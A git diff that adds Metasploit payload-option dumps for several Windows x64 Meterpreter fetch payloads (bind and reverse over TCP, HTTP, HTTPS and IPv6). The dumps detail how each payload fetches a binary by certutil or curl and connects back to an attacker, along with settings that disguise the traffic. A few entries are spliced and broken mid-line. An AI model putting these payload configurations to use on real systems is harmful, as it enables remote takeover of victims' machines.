register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate hash in the handler + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_named_pipe.txt new file mode 100644 index 0000000..a394922 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_named_pipe.txt 
@@ -0,0 +1,92 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + UserExistsError + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME pwnOSTTpRsVU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + 
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_tcp.txt new file mode 100644 index 0000000..4f92db2 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_bind_tcp.txt 
@@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + OJ Reeves + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME VdDtuESgABAW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the 
payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..bb03c6c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_reverse_http + Platform: Windows + Arch: cmd +Needs Admin: N +Evasion options for payload/cmd/windows/http/x64/meterpreter_reverse_http: +========================= + +fewer@harmonysecurity.com> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME LAeKqxIP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + 
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..bbe47a0 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64) + Module: payload/cmd/windows/http/x64/meterpreter_reverse_https + Platform: Windows + Arch: cmd +Needs Admin: N +Evasion options for payload/cmd/windows/http/x64/meterpreter_reverse_https: +========================= + +ewer@harmonysecurity.com> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME uJYCZdpzUkY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to 
automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..d10d9db --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_ipv6_tcp.txt 
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) + Module: payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + OJ Reeves + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME iAdOMBhzlNL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no The IPv6 Scope ID, required for link-layer addresses + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the 
payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..eb43fb4 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64 + Module: payload/cmd/windows/http/x64/meterpreter_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + OJ Reeves + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +EXTENSIONS no Comma-separate list of extensions to load +EXTINIT no Initialization strings for extensions +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME JJIfTrrFVG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the 
